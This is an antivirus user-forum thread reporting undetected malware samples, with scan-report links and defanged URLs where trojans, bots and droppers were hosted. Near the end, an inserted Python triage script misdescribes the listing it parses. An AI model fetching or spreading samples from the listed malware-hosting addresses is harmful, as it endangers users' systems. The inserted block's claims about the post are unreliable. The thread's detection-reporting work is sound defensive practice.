Here this suspicious IRCBot malware was not detected. Resides here: 2011-03-13 01:49:03 hxtp://www.etoro.com/SDL/typeC/eToro1140.EXE AA34FA609C772A1A75960912A863E7AC 188. 95. 97. 212 NL PHPIRCBOT.CE
See url scan: http://www.virustotal.com/url-scan/report.html?id=58a3500d79093f8d48f351b8b2618894-1300739399
File analysis scan: http://www.virustotal.com/file-scan/report.html?id=6492099ee8a84d0a6e7c9152d44517444a8906244197a8453be52b29830c3311-1300743017
Suspicious: http://wepawet.iseclab.org/view.php?hash=58a3500d79093f8d48f351b8b2618894&t=1300743150&type=js
Anubis report: http://anubis.iseclab.org/?action=result&task_id=152b9df0e8a5515c4ed6a81498033f41c
Sig buster output: Wise_Installer vna SN:1361
another example of PHPIRCBOT.CE can be found here:
htxp://2gov.co.cc/pk2/ktytyvjlfli see for this: http://www.malware.pl/report/195.80.151.83
polonus
-
Rogue Installer.
http://www.virustotal.com/file-scan/report.html?id=dc6261c9d0b8d0f486ce55f8d191b96439007569df516087412cd3fb00462350-1301111394
-
Nice find, Marc57,
Good to give a couple of the resources where this malware is treated:
htxp://malc0de.com/database/index.php?search=KR&CC=on
Go there only if you are security aware enough and know what not to click and better even what not...
and then we will land here:
htxp://malc0de.com/database/index.php?search=vaccinescan_set (for experienced users only)
where we have 5 variants with ThreatExpert reports,
If we do a bit of reconnaissance we see the malware site 124. 217. 218. 10 is down, so that makes the find a bit more irrelevant. But there seems still activity from there:
htxp://down.rprotect.co.kr/rprotect/rpwacherh.dll
trojan fake-alert see: http://www.virustotal.com/latest-report.html?resource=f920958410f6ebaddfc9a1a4d66db082
Which avast naturally detects as Win32:Adware-gen
Do not visit that site, because it also infects with Win32:Virtob
see: http://www.virustotal.com/file-scan/report.html?id=9f1410c3796ddf9348f7a0bcc85a381b500d639b550918797f2abbd65e47a1d1-1299580539
So also neatly detected by good old avast, because we can only detect what is there,
and dead links or malware sites that have been brought down do not count...
But let us see if "vaccinescan_set_etc." resides somewhere else and is alive?
4 alive of 5 found at malware for domain search:
virustotal reports for the live ones are not very, very promising,
so we see how important Marc57's posting was:
http://www.virustotal.com/file-scan/report.html?id=395feefcaa6ab9a02d489bbe03826e6df1bb6cda20087bc4dfec471341ddfa85-1300866728
&
http://www.virustotal.com/file-scan/report.html?id=8212515ad446410f6d47e9eae6eb4906fa9532b5e4952b28d843fd86b5dccfb5-1300853172
&
http://www.virustotal.com/file-scan/report.html?id=21b7dfcc8b2572ab78a30e4e7974a60998841c7d8ef7f746310d0813c6cdb445-1300853156
&
here detection is slightly better with 10/42 (23.8%)
but avast misses it altogether:
http://www.virustotal.com/file-scan/report.html?id=bf12984f90b2c8afb8f3b5a5149eabc9c979a61736b2f414d444b6903a4135d3-1301117268
So sometimes it is worth delving a bit deeper with our cold reconnaissance methods,
polonus
-
Oh and just another thing, if you know where to look, you can even find some binaries for the malware that Marc57 found, let's see, here: http://report.xandora.net/xangui/malware/view/efaeff5a90c6173b0b92d338b598f2f6
polonus
-
Here malware is residing at hxtp://cfteam.net/test/futurepack/tscplus.exe
Nice article on this malware can be found here:
http://www.offensivecomputing.net/?q=node/1448
See virustotal results here: http://www.virustotal.com/file-scan/report.html?id=84937ad73b04cf21c4bd9347ae4aeea578fe13db5cb8b7cae9fc72e1c0085ea2-1266518648
avast not detecting...
ThreatExpert report here: http://www.threatexpert.com/report.aspx?md5=b120c36aed67701358ad92e70f051820
Xandora does not have it yet, wepawet gives it as suspicious:
http://wepawet.iseclab.org/view.php?hash=1327791e62383cad70171e3ca315685e&t=1301178928&type=js
Anubis report: http://anubis.iseclab.org/?action=result&task_id=1e85aa90196fe77b41143c0da86cdd561&format=html
and look here: http://www.prevx.com/filenames/186858952724755476-X1/TSCPLUS.EXE.html
polonus
-
This zbot detection missed: http://www.virustotal.com/file-scan/report.html?id=28ef64ff922b12a8ecbe261f8046745f7f8ece9b8a1bfabf816984620a219436-1301236544
malware found to reside here:
htxp://rtfsti.com/fb/comments/facebook.update.utility.exe
See: http://info.prevx.com/aboutprogramtext.asp?PX5=3F9CD08D0002F9FB182F02B901BA7D0045ACED23
Here avast finds another variant:
http://www.virustotal.com/file-scan/report.html?id=81b65dd4f92fc29ba3f8062ed69fcb89a703e1c7d1ded2ff956aee11d5a2c0f1-1300555240
There is a lot of variety in this malware: (searched for W32/Pinkslipbot.gen.ae):
http://xandora.net/xangui/malware/search?by=name&keyword=W32%2FPinkslipbot.gen.ae
polonus
-
Rogue Installer.
http://www.virustotal.com/file-scan/report.html?id=dc6261c9d0b8d0f486ce55f8d191b96439007569df516087412cd3fb00462350-1301111394
This one is detected
There is a more up-to-date report (13/42) for this file.
-
Detection for vaccinescan_setup.exe as mentioned by danny96,
http://www.virustotal.com/file-scan/report.html?id=dc6261c9d0b8d0f486ce55f8d191b96439007569df516087412cd3fb00462350-1301111394
avast detects since:
http://www.virustotal.com/file-scan/report.html?id=dc6261c9d0b8d0f486ce55f8d191b96439007569df516087412cd3fb00462350-1301236936
But from this domain this is still up: htxp://down.vaccinescan.co.kr/app/down/vaccinescan_setup.exe
virustotal result: http://www.virustotal.com/file-scan/report.html?id=bf12984f90b2c8afb8f3b5a5149eabc9c979a61736b2f414d444b6903a4135d3-1301226435
and
http://www.virustotal.com/file-scan/report.html?id=dc6261c9d0b8d0f486ce55f8d191b96439007569df516087412cd3fb00462350-1301080931
ThreatExpert analysis: http://www.threatexpert.com/report.aspx?md5=41216f1f6e0358eaadd1d6782963e330
This new variant not detected by avast
See: http://camas.comodo.com/cgi-bin/submit?file=bf12984f90b2c8afb8f3b5a5149eabc9c979a61736b2f414d444b6903a4135d3
and http://camas.comodo.com/cgi-bin/submit?file=dc6261c9d0b8d0f486ce55f8d191b96439007569df516087412cd3fb00462350-1301080931
description: http://www.norman.com/security_center/virus_description_archive/79262/nl (norman detects this malware)
polonus
-
This malware resides here: htxp://youtub.hi2.ro/Client.jar (JAVA_DLOADER.VTG)
See: http://www.virustotal.com/file-scan/report.html?id=35970e91c4d3364f8b05f5b40d892224084c7fc207af4db8165ebf6ca9bd5357-1301338614
See: http://wepawet.iseclab.org/view.php?hash=145d4e3fc6a7adc87d664b817fa57f08&t=1301342685&type=js
also found here: htxp://86.96.195.185/Client.jar
http://www.virustotal.com/latest-report.html?resource=a6091a6335ec1fd34e8358010c044270
&
htxp://bejn.fileave.com/Client.jar
http://www.virustotal.com/latest-report.html?resource=0521c911e442cd9eec927d8439731a76
&
htxp://80.74.139.159/joomla1/tmp/sernac/cl/informes/Client.jar
http://www.virustotal.com/file-scan/report.html?id=35970e91c4d3364f8b05f5b40d892224084c7fc207af4db8165ebf6ca9bd5357-1301339415
&
htxp://www.tinyology.eu/biliard/Client.jar
http://www.virustotal.com/file-scan/report.html?id=35970e91c4d3364f8b05f5b40d892224084c7fc207af4db8165ebf6ca9bd5357-1301339415
polonus
-
http://virusscan.jotti.org/en/scanresult/397d3a1752993f12d11499c860944b2fa3b923c5
http://virusscan.jotti.org/en/scanresult/d7929e26d39b47efdf14bc6848601ba81b312129/4b736f82be65d609f35f17e2785cd78047059860
http://virusscan.jotti.org/en/scanresult/5ab878a34f0ccc12367fcdd76af6a6e33c3346d2/57cbac84f39be03486b7d849bfdeb89bb4b1ab7b
http://virusscan.jotti.org/en/scanresult/6089fb91fbeb68c3bdf024c43f1f8fcd3c75884f/abfe303db49b96d3b83fff02e27de2cc2211c4bd
http://virusscan.jotti.org/en/scanresult/53a76d9807b6f542263639c14362087cd00b6192
http://virusscan.jotti.org/en/scanresult/a41f5aa76ceb8da0b2442f5aedc08487d46fff2d
http://virusscan.jotti.org/en/scanresult/51227e87ab211b9870023fadf3014200b6fda9f8
sent to avast!
-
Thanks Burkoff for helping improving detection :)
-
Another one here: https://www.vicheck.ca/md5query.php?hash=43cb55861b7fcf1dfb6968c9ef110bcc
with VT results here: http://www.virustotal.com/file-scan/report.html?id=d4abc27a80312e066fc816e537394a33719b8ac11f5d277dc26f88a899548dad-1304483504 new Spy.Spyeye variant...
polonus
-
Is this being detected, see: http://wepawet.iseclab.org/view.php?hash=a0beb67f63645e5251c6df9bd5334ab0&t=1304632923&type=js
See: http://www.virustotal.com/url-scan/report.html?id=81647288eaf692b562bedd017aa95f67-1304625248
webshield should flag Java Deployment Toolkit
polonus
-
Sample missed: http://www.virustotal.com/file-scan/report.html?id=ee2b6faa5ea31285a57b75e529f1592b07d97ba6988bf51fcacd44a8e6014f65-1304121091
and
http://www.virustotal.com/file-scan/report.html?id=73cd5020efbb972ab0231236db98c3de225c06c4d4378747426527a1685c965a-1304339382
pol
-
this http://www.virustotal.com/file-scan/report.html?id=550efefe40429ccada456de083bad2a31d1400868bc25bc7cdc0dd2d96559d6d-1304673863
infects xp, undetected by avast, runs fake fraud security program and disables avast
spybot sd was able to clean it out
-
As the title indicates this is for VT links only not the posting of file sharing for malware samples.
They should be sent directly to avast, as you have no control over who might access this link nor what they might do with the sample. So please remove the link.
Send the sample/s to avast as Undetected Malware:
Open the chest and right click in the Chest and select Add, navigate to where you have the sample and add it to the chest (see image). Once in the chest, right click on the file and select 'Submit to virus lab...' complete the form and submit, the file will be uploaded during the next update.
Or
Send the sample to virus (at) avast (dot) com zipped and password protected with the password in email body, a link to this topic might help and undetected malware in the subject.
-
http://www.virustotal.com/file-scan/report.html?id=e2781ec26cc64f0607722627fab60816a3c160901d778fb463d1bec7a4d7f251-1305104212
http://www.virustotal.com/file-scan/report.html?id=f9fa550003521926e1d94413b3399f25bec11f96a232850211481a61c87d751e-1305035502
Sent.
-
Not detected by avast: http://www.virustotal.com/url-scan/report.html?id=641577c40b41da0a4e98c73f67524f04-1305137300
see: http://www.virustotal.com/file-scan/report.html?id=971c34a0b571d4a8da79b7d8cf52296a54ce18d9e6bff670b80c97dd4d603924-1305144526
polonus
-
http://virusscan.jotti.org/en/scanresult/d3619aff5e94ad739f3986992d537f58cb604b0f
and others sent to avast!
-
Was this the same malware as scanned here: http://www.virustotal.com/file-scan/report.html?id=ae090428cb05c1d951e1641d0471b6533a5bda75db1c557cca057a3372d0336b-1305526099
reported to VT as Necurs rootkit with funny blacklist by VT Community User EP_XOFF
Kaspersky does not detect it at the VT scan of May 16th last,
polonus
-
Was this the same malware as scanned here: http://www.virustotal.com/file-scan/report.html?id=ae090428cb05c1d951e1641d0471b6533a5bda75db1c557cca057a3372d0336b-1305526099
reported to VT as Necurs rootkit with funny blacklist by VT Community User EP_XOFF
Kaspersky does not detect it at the VT scan of May 16th last,
polonus
http://www.virustotal.com/file-scan/report.html?id=ae090428cb05c1d951e1641d0471b6533a5bda75db1c557cca057a3372d0336b-1305708308
-
http://www.virustotal.com/file-scan/report.html?id=ed19b58dc831d9b29d0cbb759be5f262df9723520308dcb1b7fb693f15f90ceb-1305800557
http://www.virustotal.com/file-scan/report.html?id=9976d50ad3d38cca91096a062a69875efc5758d6da8fe5ddbd7fa4f432deb1f3-1305794383
http://www.virustotal.com/file-scan/report.html?id=4012f175141859ccf79b82ff434b3bc78802ed276e99a75f97ce9c6f1ee9b8cf-1305800901
http://www.virustotal.com/file-scan/report.html?id=2caa418b31686dd8213a7b7ab5e8e965c612f68371be4d5a2b738d83f6449097-1305801522
http://www.virustotal.com/file-scan/report.html?id=5397a8aed08dc72b352c5f0d85d24f9e5cbb6028723860b8b1c6fd9dbe460b11-1305801694
http://www.virustotal.com/file-scan/report.html?id=5e8bf5047362c4d6e0abfb2439b80f02a93d80393322400fab9c48c4e7eb9590-1305801771
http://www.virustotal.com/file-scan/report.html?id=503d885e8f84d9fb3f2bf0d306c1270413e6450987076216f72779bc9215a469-1305801899
http://www.virustotal.com/file-scan/report.html?id=5a09cae05fe28d6067d516b045e9a646ebdf6a3c50cb5abd41c97b101968e5e4-1305801988
http://www.virustotal.com/file-scan/report.html?id=94105bafc9f65fd8b0585e75fe56046ef3f722be3253c2461fc79dee48945258-1305802096
http://www.virustotal.com/file-scan/report.html?id=9688c395c810e7d42ae0f1adad18ac580a72515fd467d4ca8de021137c0384f0-1305801674
http://www.virustotal.com/file-scan/report.html?id=d7e359f175b09f40ae19c4d58d22d4e5dfd3514aae36a810590059a39d5110d9-1305802429
http://www.virustotal.com/file-scan/report.html?id=1232441fc19e1699a5bb0e1fa8a1b512e34c12e115e5888c06336c14f0847188-1305801996
http://www.virustotal.com/file-scan/report.html?id=4ee4be381b51c96db49ea85b6db9d3fdcad5a705ae79d128e61523f3d58e6730-1305802579
http://www.virustotal.com/file-scan/report.html?id=1664f32dbd501190884bd2dedb15c5dc092fa057406592fa01ce7fc795695e3b-1305802676
http://www.virustotal.com/file-scan/report.html?id=72050a447bea7c7138080b931b885eb253eaa30598a2cad421cfd6e35c67386f-1305802745
http://www.virustotal.com/file-scan/report.html?id=bfae2d6eb055defad1a1ceb00d35f125cc7d6c59f1c04e42a901f52a1f0c7169-1305802295
http://www.virustotal.com/file-scan/report.html?id=d0ace36fd1326700a0f65c2d66a7193e5516b55760869f7689d7158b2dc376bc-1305802885
http://www.virustotal.com/file-scan/report.html?id=73960394a70b102c8484afda811a7b9420df960cface8647bfbe35f327726f47-1305802472
http://www.virustotal.com/file-scan/report.html?id=dd4180ea68df45fa0e210ce089b250a34d32e73dc677894a4466081a397b5547-1305803054
and others sent to avast!
-
http://www.virustotal.com/file-scan/report.html?id=137e9afb4c49ceab45fff506f5a92b5cddedcac1694adcd5eb6b962d28dce5c1-1305819545
-
Hi DCS,
Similar malware not detected here: http://www.virustotal.com/file-scan/report.html?id=02fbee1adf9167199c07a27deede89f8db8710aed06fd3ffca9fe102ffeb5a72-1305737459
polonus
-
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=625
http://www.securelist.com/en/blog/11266/Rootkit_Banker_now_also_to_64_bit
-
http://www.virustotal.com/file-scan/report.html?id=dfbdaf4621aa82cf142b02d2d4011fec8f3a1e942954949139791e963056ba41-1305977721
http://www.virustotal.com/file-scan/report.html?id=8b71c8e4bddef1b145b824365de43b2fe9b837a55b024448a578ef31bb334659-1305978627
sent to avast! ;D
-
Another one here: http://www.virustotal.com/file-scan/report.html?id=fad4568347cc738715f369841c75c64c574a459ff232fc721de62fd6e9daf077-1306087743
a TR/Crypt.ZPACK.Gen variant detection...
polonus
-
VT scan result: http://www.virustotal.com/file-scan/report.html?id=d602509ad79860b3d019d90626836da344b09a24c28868347333ea6244fcae68-1305067609
and here:
http://www.virustotal.com/file-scan/report.html?id=d60d11aaaf0f89f77563cc49cf4e1deebb7f34b00353aee5f9512a8ddcb60a44-1303985474
See for malware: http://tools.sucuri.net/?page=tools&title=blacklist&seeall=1&detail=591226c1fb8da24e59e4e238bf8606ce
polonus
-
Hi Burkoff,
[SOLVED]
We have detection here: http://www.virustotal.com/file-scan/report.html?id=8b71c8e4bddef1b145b824365de43b2fe9b837a55b024448a578ef31bb334659-1306258405
and
http://www.virustotal.com/file-scan/report.html?id=dfbdaf4621aa82cf142b02d2d4011fec8f3a1e942954949139791e963056ba41-1306151345
Means avast users are now being protected,
polonus
-
Below are just a few from a personal collection of mine over the years to find to my amazement, Avast is missing out on some fun. Now I do have to state I do like Avast and enjoy using the product, however I am sad to see things like this occur. I have submitted several of these files to the lab time and time again to find no new changes in my scans. I hope we can refrain from insulting me for my huge post here and maybe work together as a community and solve this lack of detection. If you care to view the links, Please take note on the Dates on all of them. I think you will be in for a good one.
Until next time,
Shaggie.Rydez
___________________
http://www.virustotal.com/file-scan/report.html?id=07fcc10185ff940d84a6ce10cd9dcb459a9316a472209e27f5bf835ca90abe20-1306744067
http://www.virustotal.com/file-scan/report.html?id=783a565ae5b4facf66622acb2ede3b11dadf655a4ef66bdd02feb0fc2224b770-1305044090
http://www.virustotal.com/file-scan/report.html?id=54c1d5e2059f880f76c361b18f3c5d93ef188e41e82c5ccc4c0b96830ceef7e0-1305296788
Setup-trial.exe: submit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=cb9f592aa5dd134775c4c4a2599701c696e102d9f4b647530bcacc3558ae76c9-1306744525
http://www.virustotal.com/file-scan/report.html?id=9f2864435b39e128e0a4b8a81308461d014fbecb67a380ea215c3418ecc3c70d-1305755334
http://www.virustotal.com/file-scan/report.html?id=8281f06cc07dd377ecf78d9f1e435679f4b27f2d3f4f9ea727027e56e0e57b5f-1303293776
https://www.virustotal.com/file-scan/report.html?id=9529d01c9488ca48735610b8fe3a9be3f4749952b68e6e23fd1b0a62b8390250-1300057230
EXEfile.exe: Submit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=1cff9194f37821f0141abab28afb08c36b0e8e795e6f766f400b7acaa95e4d64-1306745273
BE.exe: Submit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=ac4be6281d33f22c652083d88488892c0f7260b75b61f0ca519e7970dc9672a8-1306745910
antieta.zip: Submit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=3abce78c97f8a0fe9d4b3df48d91a425bf70eaae8db9a8c1f5b354fd72c67389-1306746581
Cih 14.zip: Submit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=e323f74fbc4c8b4855be2f08c340cbde3c3f5461b1af46bc7581930a568bbf05-1306746160
kompanio.zip: Submit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=3eabaab7a9914299abe3526586f70a038c770add1d4580031036b1fa8a1d60d9-1306746233
No Pasaran.zip: Submit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=433817e21202769645877386b8506b6be907ceb23ae1c7854b7826ef4d6cddd5-1306746829
nukeviruses.zip: Submit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=2d41e0c82f548fc09b972bbcdc19cc39660f548303b8c647788cc96fb1ded201-1306746884
ontario3.zip: Submit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=7deea85ae2d59f4b886a00e89f423833ea218ea16530ee745de0d6329d8dbd51-1306746422
v100.zip: Submit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=b79d7f4a2ff942479d562da6197fa983d953aa1b526e22a4dcbb98db3bb53f41-1306746497
virus.zip: Submit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=fba9f3edc6f9931fe9070ebbef0ef0114ff88d91b8f2f645dbd21280921640f4-1306747143
wpart_c.zip
http://www.virustotal.com/file-scan/report.html?id=02519abf272a415583bce7e45b8abe0ae70d7e160351b11b692ab01b7fb32933-1287410138
-
send undetected samples to virus @ avast.com in a password protected zip.file
Mail subject: undetected sample(s)
Password: infected
-
Below are just a few...
Thanks for reporting/helping..!
Btw, interesting: Some of these samples are detected by old avast, but not by the new one..???
-
Below are just a few...
Thanks for reporting/helping..!
Btw, interesting: Some of these samples are detected by old avast, but not by the new one..???
I am guessing....bc they are malware that only works/will harm older OS.... not supported by latest avast, so why detect
-
I am guessing....bc they are malware that only works/will harm older OS.... not supported by latest avast, so why detect
Well, maybe...
-
googled a bit.... the second last sample... this is just a name search, not MD5
http://www.virustotal.com/file-scan/report.html?id=fba9f3edc6f9931fe9070ebbef0ef0114ff88d91b8f2f645dbd21280921640f4-1306747143
Virus.DOS.PS-MPC.2832
Detected: Oct 02 1998 20:00 GMT
Released: Oct 02 1998 20:00 GMT
http://www.securelist.com/en/descriptions/old16509
if you scroll down, you find the avast detection name from the VT scan
-
This thread should be pinned for easy reference! It is a great resource! Thanks Avast!
Jack
-
New bancos variant detected: http://www.virustotal.com/url-scan/report.html?id=fece6f14a975a38232e01066097d6dab-1306760379
File detection VT: http://www.virustotal.com/file-scan/report.html?id=84906f0069350234d413f8c89aba48ec9543ea027adda400cba4c9fd5f8b0227-1306767585
polonus
Detection here: http://www.virustotal.com/file-scan/report.html?id=84906f0069350234d413f8c89aba48ec9543ea027adda400cba4c9fd5f8b0227-1307115470
-
I have submitted several of these files to the lab time and time again to find no new changes in my scans.
This worries me... I believe the avast team makes a good and hard effort to improve detection and probably your samples aren't in the wild... But should we wait that much? Is it worth submitting?
-
Avast does not detect: http://www.virustotal.com/file-scan/report.html?id=4719f84d5d67d29fd8cdb24147ed303b75b93dfaeee7ba6fffd2b63d3fc10420-1307819072
See:
http://www.virustotal.com/url-scan/report.html?id=fede0daafc9754597fd358fb662331ba-1304017674
Trojan gen erci1.exe (on the sacour dot cn list of malicious URLs)
polonus
-
http://www.virustotal.com/file-scan/report.html?id=4cd097131daffef84e6a038c0667d89a8bce5fdf55b1782e139cd706836d5cd3-1307807203
http://www.virustotal.com/file-scan/report.html?id=20a265379b06f20df28d452200b6ec517c2f8eb99827dfed3c50965e32e226cb-1307812518
http://www.virustotal.com/file-scan/report.html?id=14738c45344e8cddb6c1ceb9aaa4734a8b9bf94f8bcf062902a422153c65cecf-1307813175
http://www.virustotal.com/file-scan/report.html?id=c5ed637fa9da0eac54353d35ed49377d7ad3e9c9c02d980ea6d5577312713ae2-1307813398
-
Presumably you have sent these samples to avast, as just sending them to virustotal isn't very effective at all.
-
From virustotal FAQ
In exchange for providing an antivirus engine you will receive all files submitted to VirusTotal that are not detected by your product and are detected by at least one other antivirus, along with their corresponding VirusTotal reports.
So avast will get the files if I submit them or not.
-
So avast will get the files if I submit them or not.
Yes, but it could take a while.
It's always better to submit it directly to the avast! av lab.
-
So avast will get the files if I submit them or not.
Yes they do, but a) it takes time and b) they also get a lot of chaff with the wheat/samples, as has been mentioned in the forums. So it is going to take longer to sort that wheat from the chaff to get the benefit, direct submission to avast is quicker.
-
Hi folks,
This one not yet detected by avast: http://www.virustotal.com/file-scan/report.html?id=75153fa12146d3505d83dda9fb2ae5cedc085f0360adad5640bfe29a2e14c6f1-1307976186
See: http://www.threatexpert.com/report.aspx?md5=5e27d125661e91796759b542c59240d3
See: http://www.garyshood.com/virus/results.php?r=5e27d125661e91796759b542c59240d3
Is the Trojan horse TR/Crypt.FKM.Gen..Fraudtool
Malware link forwarded to virus AT avast dot com
polonus
-
Hi folks,
This backdoor,... keys.jpg - ALERT: [PHP/BackDoor.D] keys.jpg
Contains detection pattern of the PHP virus PHP/BackDoor.D,
not detected by avast: VT scan: http://www.virustotal.com/url-scan/report.html?id=c1d19d8a76b2fb50290f6afd3a04b067-1308160512
file detection VT:
http://www.virustotal.com/file-scan/report.html?id=7c55c7b55c745d07ea75c2b944eb6a4ff57447bbc005e7d669851178c48505b6-1308167744 16/ 42 (38.1%)
polonus
-
Hi forum friends,
This sample not detected by avast yet: http://www.virustotal.com/file-scan/report.html?id=1ee330f81e3999a8bfdf95461ccf7052eac3ba04e2b061e7822f90f9fcb3e714-1308408426
generic malware
File hash: 9cd70492ad620bb922ad0bb815708c5a
See: http://vscan.urlvoid.com/analysis/9cd70492ad620bb922ad0bb815708c5a/cmVhZG1lLWV4ZQ==/
&
See: http://www.threatexpert.com/report.aspx?md5=9cd70492ad620bb922ad0bb815708c5a
Sent to virus AT avast dot com
polonus
-
uploaded to avast / MBAM / SAS ;)
http://www.virustotal.com/file-scan/report.html?id=1b95fd5c45a1314f4abf593ce012f413f017b93949af506f7a8e85bd3fe79c71-1308425693
http://www.virustotal.com/file-scan/report.html?id=5cae17ca820c5a818e0648cf9de76ad1cc2a7c997c51f8912b67bcdd53b343ed-1308425362
http://www.virustotal.com/file-scan/report.html?id=91eda36708ce8277e84fcbecfb65dfb5e81c0f9ea0e89c70cd38872a66104601-1308425376
http://www.virustotal.com/file-scan/report.html?id=64dfb39015b938dca3e510b1eb3ba08a8535e830abe8ecbfcd2f3d1e765bae41-1308425387
-
Hi Pondus,
Can this have been a different variant, seen to the MD5 hash?
http://file.virscan.org/report/842711ae4167a3045aee49d8b9b43567.html
See: http://anubis.iseclab.org/?action=result&task_id=1b48f9caf85a67c142906d1ed5ed7893a&format=html
polonus
P.S. And this one: http://www.virustotal.com/file-scan/report.html?id=d6edb11340619afb783ff8086f64c4ecb6733373d26ec57d23432318b8791423-1308412278
-
sure looks like it.....not same MD5
ThreatExpert report on the first sample
http://www.threatexpert.com/report.aspx?md5=2c2d488d727589158f907dd36c04eb9e
-
Missed by avast redirect to Zeusv2, see: http://www.virustotal.com/url-scan/report.html?id=645dbea8d0d2249d2a3be5f523f28f36-1308487354
and http://www.virustotal.com/file-scan/report.html?id=a4888546e938c43404b307e6416fcaaa06cf7363d94efed5cfbd491280f564ab-1308494558
also re: http://wepawet.iseclab.org/view.php?hash=645dbea8d0d2249d2a3be5f523f28f36&t=1308494638&type=js
and accompanying Anubis report:
http://anubis.iseclab.org/?action=result&task_id=1947012aa7e40552481eed1a3ec1d6ad9
Info forwarded to virus AT avast dot com
polonus
-
This malbanker malware, Winsanta.exe not detected by avast, see:
http://www.virustotal.com/file-scan/report.html?id=51f4d16f405ec3d5b7b16d2528a0718613acceb3b03e7e1e4b33fd987350b40b-1308482476
Threatexpert analysis: http://www.threatexpert.com/report.aspx?md5=47ba243c524c6a978a53d36f73663a66
polonus
-
Generic trojan not detected by avast, VT: http://www.virustotal.com/url-scan/report.html?id=097498da46f8ac24e7b4407db4ffa237-1308588739
File analysis at VT: http://www.virustotal.com/file-scan/report.html?id=0b8a79442001bede8cd3ff233a296e5868cfa48ae6a52b903f46d05e5f91135d-1308596320
See Anubis report: http://anubis.iseclab.org/?action=result&task_id=10a02c524dadf2b942dcdd8b155f0baea
polonus
-
Hello
This malware was shutting Avast down especially it seemed while Avast was updating or scanning.
http://www.virustotal.com/file-scan/report.html?id=0ed55ae8fc6d7ff2dc4a5175b644f5fc6068c257ceaaf5f2b47e392b786bd1f9-1308641359
emailing sample to virus(at)avast
The file name is system32StopAllWorw.exe but not sure what its classified as (trojan, backdoor etc)
Thanks for great Antivirus software!
Grant
-
Thanks for submitting grantdb.
Malware that kills the antivirus must have special attention imho.
-
Hi here is the behaviour summary for this: http://xml.ssdsandbox.net/view/334fa2a25a6097143f540b26dd13878b
Can also come as part of downloaders:
e.g.
Look up at ViCheck.ca and get VT results: http://www.virustotal.com/file-scan/report.html?id=e548a71809e0c66deca4aa92752021c1dfa4db2f8deb95b8ba588c2d2abfc51a-1241488981
avast detects...
(path / file version / company / MD5 hash)
.\system32stopallworw.exe / 6.0.2900.3156 / Microsoft Corporation / efd496c8e5507f188e47df4edbc91aa9
.\system32stopallworw.exe / 6.0.2900.3156 / Microsoft Corporation / 407364a0c3ebd0b544d8689c45383935
\system32stopallworw.exe / 6.0.2900.3156 / Microsoft Corporation / 3c41382942fb749fd6f1f2144e2e9dca
..\system32stopallworw.exe / 6.0.2900.3156 / Microsoft Corporation / 1db8c421b4fa7bfcddcc14bd38f5c89c
.\system32stopallworw.exe / 6.0.2900.3156 / Microsoft Corporation / 12cc1b486051536d9ffa7b3459cb745d
polonus
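The listing above shows the same file name, the same Windows-looking version string (6.0.2900.3156) and the same "Microsoft Corporation" vendor claim behind five different MD5s. As an added example (not polonus' material, nor anything avast or VirusTotal does), here is a small triage script that parses such a flat listing and flags metadata triples that occur with several distinct hashes; the five records are copied from the post, laid out four lines per sample, and the "many hashes behind one vendor/version claim" heuristic is an assumption about how a defender would sort such a list, not proof of anything by itself.

```python
import re
from collections import defaultdict

# Constructed from the listing in the post above: four lines per sample
# (path, file version, company name, MD5).  The "= MD5hash" annotation on
# the first hash is the poster's and is stripped by the parser.
LISTING = r"""
.\system32stopallworw.exe
6.0.2900.3156
Microsoft Corporation
efd496c8e5507f188e47df4edbc91aa9 = MD5hash
.\system32stopallworw.exe
6.0.2900.3156
Microsoft Corporation
407364a0c3ebd0b544d8689c45383935
\system32stopallworw.exe
6.0.2900.3156
Microsoft Corporation
3c41382942fb749fd6f1f2144e2e9dca
..\system32stopallworw.exe
6.0.2900.3156
Microsoft Corporation
1db8c421b4fa7bfcddcc14bd38f5c89c
.\system32stopallworw.exe
6.0.2900.3156
Microsoft Corporation
12cc1b486051536d9ffa7b3459cb745d
"""

MD5_RE = re.compile(r"^[0-9a-fA-F]{32}")


def parse_listing(text):
    """Turn the flat four-lines-per-sample listing into a list of records."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) % 4:
        raise ValueError("listing is not a multiple of four lines")
    records = []
    for i in range(0, len(lines), 4):
        path, version, company, md5_line = lines[i:i + 4]
        m = MD5_RE.match(md5_line)
        if not m:
            raise ValueError("expected an MD5 on line %d: %r" % (i + 4, md5_line))
        records.append({
            "path": path,
            # bare file name, without the varying .\ / \ / ..\ prefixes
            "name": re.split(r"[\\/]", path)[-1].lower(),
            "version": version,
            "company": company,
            "md5": m.group(0).lower(),
        })
    return records


def group_by_version_info(records):
    """Map (name, version, company) -> set of MD5s seen with that metadata."""
    groups = defaultdict(set)
    for r in records:
        groups[(r["name"], r["version"], r["company"])].add(r["md5"])
    return dict(groups)


def suspicious_groups(records, min_hashes=2):
    """Return metadata triples that appear with at least min_hashes hashes.

    One genuine vendor build has one hash; the same name/version/vendor
    claim behind many different hashes (five in this post) is a triage
    signal for repacked or polymorphic droppers.  Heuristic, not a verdict.
    """
    return sorted(
        (key, sorted(md5s))
        for key, md5s in group_by_version_info(records).items()
        if len(md5s) >= min_hashes
    )


if __name__ == "__main__":
    for (name, version, company), md5s in suspicious_groups(parse_listing(LISTING)):
        print("%s %s claims '%s' with %d distinct MD5s:" % (name, version, company, len(md5s)))
        for h in md5s:
            print("   ", h)
```

Running it prints the single group with its five hashes; on a larger listing it would print one block per vendor/version claim that is shared by two or more samples, which is the set worth looking at first before submitting anything.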
-
Undetected malware
1:http://www.virustotal.com/file-scan/report.html?id=8c16baa04cd8055ffb228cf152a03724cb80fccfbd7f39853af6d08217986ad7-1308667154
Sent to Avast team/lab
-
Fake antivirus that are not detected by avast
http://www.virustotal.com/file-scan/report.html?id=361d27adc51258db9e3e50858d592dbd6b236aeece3568993a768b255c1b2c6f-1308927934
